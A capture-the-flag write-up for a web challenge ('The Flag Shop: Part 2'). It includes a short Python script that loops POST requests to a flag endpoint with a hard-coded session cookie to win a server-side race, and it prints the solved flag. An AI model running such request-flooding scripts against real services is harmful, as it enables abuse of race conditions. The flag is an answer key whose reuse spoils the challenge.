The Flag Shop: Part 2 - 100 (Web Exploitation)
Write-up by Oksisane
Problem
A bit harder. http://flagshop2.problem.sctf.io
Hint
Time is precious. Never waste it.
Answer
Overview
Spam requests to /api/flag
and refresh the account page.
Details
Looking at the source of flagshop2, the only change is this new code
$.post("/api/flag", function() {
display_message("#unlock_msg", "success", "done.");
});
Looks like the /api/flag/unlock
and /api/flag/delete
are done server side now. We need a way to beat the server to the flag! The way I did it is by spamming requests to /api/flag
using Python. Here's the source:
import requests,time
flagurl = "http://flagshop2.problem.sctf.io/api/flag/"
payload = ""
headers = {
'cookie': "sid=s%3Arygx5swsocb5g3gylg3qhh7gk.exfuOQEV4ou6S%2Fb2QppzLiYukQWHqfFGHwVtuS7wDdM; email=s%3Aehsan%40blah.com.s2ROHWeVypYBnyikyx7aWY4ShzelKWs65JUMvzGsBzk"
}
def requestFlag():
response = requests.request("POST", flagurl, data=payload, headers=headers)
print response.text\
while True:
requestFlag()
#sleep .1 to be nice :)
time.sleep(.1)
The cookie header is used so the site still knows who we are logged in as. Running the script and refreshing the page a few times gives the flag.
Flag
flag{4f8703d93bdb7b46615e498d}